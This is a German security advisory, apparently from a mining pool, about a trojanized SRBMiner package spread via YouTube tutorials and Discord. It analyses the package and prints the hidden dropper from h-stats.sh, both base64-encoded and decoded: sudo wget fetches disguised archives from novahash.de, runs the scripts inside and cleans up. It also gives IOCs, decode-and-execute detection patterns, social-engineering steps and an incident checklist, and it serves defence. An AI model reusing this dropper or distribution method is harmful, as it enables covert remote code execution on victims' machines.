Trojanisiertes SRBMiner-3.2.5-Paket im Umlauf
Was Miner wissen müssen — in der Reihenfolge, in der es sie interessiert

IOCs — für die Kurzentschlossenen

Alles Wichtige für Defender in einem Block. Ausführliche Details weiter unten, aber wer nur seine Flotte prüfen will, fängt hier an.

Die Dateisystem-Artefakte werden nach jedem Lauf gelöscht — ihr Fehlen bedeutet also nicht, dass das System sauber ist. Nur ihr Vorhandensein ist schlüssig. Beurteilen Sie lieber anhand von Logs, anhand des Inhalts von h-stats.sh auf der Platte und anhand ausgehenden Traffics zu novahash.de.

Verteilungsweg

Das Paket wird derzeit als SRBMiner-Multi-Download unter miningrepositories.blog angeboten — einer Domain, die generisch und vertrauenswürdig klingen soll, wenn jemand nach Miner-Binaries sucht. Sie ist kein bekannter oder legitimer Vertriebskanal für SRBMiner und, soweit erkennbar, für gar nichts.

Auslieferung: YouTube-Tutorials und Discord-Seeding (beobachtet)

Das trojanisierte Archiv liegt nicht einfach auf einer zufälligen Domain herum und wartet, dass jemand darüber stolpert. Es wurde gezielt über Kanäle beworben, denen Miner vertrauen:

Was das über das Vorgehen des Angreifers verrät

Das ist Social Engineering, kein Drive-by-Download. Jeder Schritt des Ablaufs ist bewusst so gewählt, dass die Deckung des Opfers runtergeht:

1. Kleine Coins mit aktiven Discord-Communities und einem stetigen Zustrom an Einsteigern aussuchen. C64Chain und QTC sind genau der Typ Coin, bei dem ein neuer Miner in den Discord kommt, fragt, wie er loslegen kann, und dankbar den ersten Link annimmt, den ihm jemand Hilfsbereites in die Hand drückt. Große Coins werden kritischer geprüft, kleine werden gutgläubiger angenommen.
2. Ein funktionierendes Tutorial produzieren. Das YouTube-Video zeigt ein Rig, das tatsächlich mint — weil die Miner-Binary im Archiv ein echter, lauffähiger Miner ist (Tarnung). Sichtbarer Beweis überzeugt: ein Video mit einlaufenden Accepted Shares ist mehr wert als tausend „vertrau mir“.
3. Erst Reputation aufbauen, dann bewaffnen. Sobald das Video existiert und ein paar Kommentare sagen „hat bei mir funktioniert, danke!“, trägt sich der Link selbst weiter — jeder neue Zuschauer sieht Social Proof, bevor er einen Grund zum Misstrauen sieht.
4. In Einsteiger-Kanäle streuen. Den Link in Discord-Kanäle posten, wo Neulinge um Setup-Hilfe bitten. Der Payload läuft beim ersten Stats-Poll; der Angreifer braucht vom Opfer nichts außer „mach das Tutorial nach“.
5. Darauf setzen, dass Community-Moderatoren keine Archive auditieren. Kaum ein Coin-Discord hat die Ressourcen, jedes „hilfreiche“ Tarball, das in seinem Mining-Kanal landet, zu reverse-engineeren. Ein freundlicher Nutzer mit YouTube-Kanal wirkt wie ein Community-Mitglied, nicht wie eine Bedrohung.

Wer Teil der C64Chain- oder Qubit (QTC)-Community ist und sein Rig nach dem Argenminers-Tutorial eingerichtet oder den Link an Freunde weitergegeben hat — bitte dieses Advisory in der Community teilen und jedes Rig, das nach dieser Anleitung aufgesetzt wurde, als kompromittiert behandeln.

Was im Archiv steckt

Das Archiv ist eine vollständige Hive-OS-Custom-Miner-Integration — und eine Minerstat-Integration (mmp-*) ist gleich mit dabei. Echte Distributionen liefern das eine oder das andere aus, nicht beides, wodurch die Kombination allein schon verräterisch ist.

Verräterische Spuren der Neuverpackung

Keines der folgenden Merkmale ist für sich genommen bösartig — sie sind die diagnostischen Hinweise, dass das Paket nicht von dort kommt, woher es behauptet zu kommen:

• Spanische Kommentare in h-run.sh und h-manifest.conf — z. B. „Verificar si ya está corriendo“, „Cargar manifest“, „Ejecutar el binario con parámetros“, „Nombre del miner“, „Ruta al archivo de configuración“. Legitime Upstream-SRBMiner-Integrationen sind auf Englisch.
• Interne Versionsabweichung. h-manifest.conf deklariert CUSTOM_VERSION=3.2.5; mmp-external.conf deklariert EXTERNAL_VERSION="2.6.8-custom". Echte Pakete sind intern konsistent. Dieses nicht.
• Hive- und Minerstat-Integrationen gemeinsam ausgeliefert. Upstream liefert jeweils nur eins, nie beides.
• Nicht gestrippte Binary. Upstream-Release-Binaries werden gestrippt, um Größe zu sparen und Analyse zu erschweren. Diese hier nicht — deutlicher Hinweis darauf, dass der Angreifer aus dem Quellcode selbst gebaut hat.

Der Payload: h-stats.sh

h-stats.sh ist zum größten Teil — ärgerlicherweise — ein vollkommen funktionaler Hive-OS-Stats-Parser. Er fragt die HTTP-API des Miners auf 127.0.0.1:$MINER_API_PORT ab, liest Hashrate, Shares, Temperaturen und Lüfterwerte für GPU- und CPU-Worker, kommt mit Single- und Dual-Algo-Mining zurecht und liefert gültiges Stats-JSON an den Hive-Agenten zurück. Das ist keine Nebensächlichkeit, sondern essentielle Tarnung: Würde das Skript Fehler werfen, erschiene das Rig bei Hive als offline und der Operator würde binnen Minuten nachsehen.

Nach der legitimen Stats-Logik und vor den abschließenden Fallback-Zuweisungen wurde dieser Block eingefügt:

p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &

Dekodiert lautet der base64-Block:

nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
  && sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
  && sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
  && unzip -q -o /etc/mqtato-fla.zip -d /etc \
  && bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &

Ablauf, Schritt für Schritt

1. Zwei vermeintliche Bilddateien (.png und .jpg) werden per wget von novahash.de geladen. Die Bildendungen sind Tarnung — der eigentliche Inhalt sind ZIP-Archive. Eine bekannte Methode, um naive Egress-Filter auszutricksen, die Skript- und Archiv-Traffic prüfen, Bilder aber durchwinken.
2. Jedes Archiv wird nach /etc/ geschrieben, in .zip umbenannt und mit unzip -o (Überschreiben) entpackt.
3. In jedem Archiv steckt ein Shell-Skript (recuaikaan.sh, mqtato-fla.sh), das anschließend ausgeführt wird — das erste explizit mit sudo, das zweite im bereits bestehenden Root-Kontext des Hive-Agenten.
4. Alle vier Artefakte (beide .zip-Dateien und beide .sh-Skripte) werden anschließend aus /etc/ gelöscht. Das säubert den Dropper-Fußabdruck: Eine Nachschau in /etc/ findet nichts mehr, während das, was die Stage-2-Skripte anderswo installiert haben, resident bleibt.
5. Die gesamte Kette läuft im Hintergrund per nohup … &, damit die legitime Stats-Ausgabe weder blockiert noch verzögert wird. Hive sieht weiterhin ein „gesundes“ Rig.

Warum h-stats.sh die perfekte Stelle ist

Der Tarn-Miner: srbminer_bin

Die im Paket enthaltene Binary sieht nach einem legitimen oder nahezu legitimen SRBMiner-Multi-Build aus. Aus Angreifersicht besteht ihre Aufgabe darin, unauffällig zu sein:

• Datei: ELF 64-bit LSB shared object, x86-64, dynamisch gelinkt.
• Größe: 20.309.184 Byte (~20 MB).
• SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
• BuildID: fc2487ec223c91039748e53c08328af91260cd8c
• Gestrippt: Nein (für ein Upstream-Release untypisch — die sind gestrippt).
• Eingebettete Build-Pfade: verweisen auf /home/doktor/VSCode/SRBMiner-Multi/Libs/{clew,libmicrohttpd,libressl,hwloc}/linux — die tatsächlichen Pfade des SRBMiner-Autors (doktor83). Passt zu einem Build aus echtem oder leicht verändertem Quellcode.
• Eingebettete URLs: keine. Keine Referenzen auf novahash.de oder die Dropper-Dateinamen.

Der Plan des Angreifers setzt darauf, dass der Miner plausible Hashrate und Shares produziert, damit Hive- und Minerstat-Dashboards normal aussehen und dem Operator kein Anlass zum Nachsehen bleibt. Alle beobachtete bösartige Funktionalität liegt in h-stats.sh; die Binary ist nicht der Angriffsvektor.

Vollständige Indikatoren der Kompromittierung

Netzwerk

• Domain: novahash.de — an Firewall und DNS blockieren
• https://novahash.de/fileslab/recuaikaan.png
• https://novahash.de/fileslab/mqtato-fla.jpg
• Verteiler-Domain: miningrepositories.blog

Dateisystem (Dropper-Artefakte)

Werden nach Ausführung vom Dropper gelöscht — Abwesenheit ist kein Freibrief:

/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh

Datei-Hashes

• srbminer_bin SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
• srbminer_bin BuildID: fc2487ec223c91039748e53c08328af91260cd8c

Prozess- und Verhaltenssignaturen

• wget-Aufrufe an novahash.de aus dem Hive-user-Konto oder von Root
• nohup sh -c-Aufrufe, gestartet aus h-stats.sh
• sudo bash /etc/*.sh-Einträge in Sudo-Logs (sofern Auditing aktiviert ist)
• Ungewöhnliche .zip-, .png- oder .jpg-Dateien, die zu irgendeinem Zeitpunkt in /etc/ auftauchen

Paket-Warnzeichen (nützlich zum Auffinden ähnlicher trojanisierter Pakete)

• Spanische Kommentare in Hive- oder Minerstat-Integrationsskripten, die upstream auf Englisch ausgeliefert werden
• Interne Versionsabweichungen zwischen Manifest-Dateien
• Nicht gestrippte Release-Binaries
• Hive- und Minerstat-Integrationen in einem Paket
• Lange base64-Strings in beliebigen h-*.sh- oder mmp-*.sh-Skripten
• base64 -d | sh, base64 -d | bash, xxd -r -p | sh oder ähnliche Decode-und-Execute-Pipelines in Stats- oder Run-Skripten

Incident-Response-Checkliste

Wer das Paket auf irgendeinem Rig oder Server installiert hat, arbeitet die folgenden Punkte der Reihe nach ab. Leicht verdriesslich dabei. Das ist die korrekte Haltung.

ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null

cat /etc/ld.so.preload   # sollte leer sein oder nicht existieren

find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
     -mtime -30 -type f -ls 2>/dev/null

crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all

find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config

ss -tnp | grep -E '(srbminer|sh|wget|curl)'

chkrootkit
rkhunter --check --skip-keypress

grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null

Härtung: so landen Sie gar nicht erst hier

Ein paar Gewohnheiten, die genau das hier von Anfang an verhindert hätten. Keine davon neu, alle ein bisschen langweilig — langweilig ist das angestrebte Gefühl.

Ein Wort von Suprnova

Pool-Betreiber und deren Miner sind für diese Art Angriff eine besonders lohnende Zielgruppe. Ein trojanisierter Miner auf einem Rig kompromittiert nicht nur dieses Rig — er kann Hashrate vom eigentlichen Pool umleiten, Pool-Credentials aus Config-Dateien ziehen und als Sprungbrett in die weitere Infrastruktur dienen. Unsere Nutzer sind im Schnitt technischer, wertvoller und gezielter ins Visier genommen als die allgemeine Population der „Menschen, die Dinge herunterladen“ — und diese Aufmerksamkeit ist, unter dem Strich, kein Kompliment.

Wenn Ihnen ein verdächtiger Miner-Download, ein ungewöhnliches Archiv oder eine Discord-/Telegram-DM mit einem „custom“ oder „patched“ Miner auffällt, leiten Sie es bitte an admin@suprnova.cc weiter oder posten Sie es in unserem Discord. Wir sehen es uns an, aktualisieren dieses Advisory bei Bedarf und warnen die Community. Gürtel, Hosenträger und ein gesundes Maß an gemeinschaftlicher Paranoia — die drei Säulen eines glücklichen Mining-Rigs.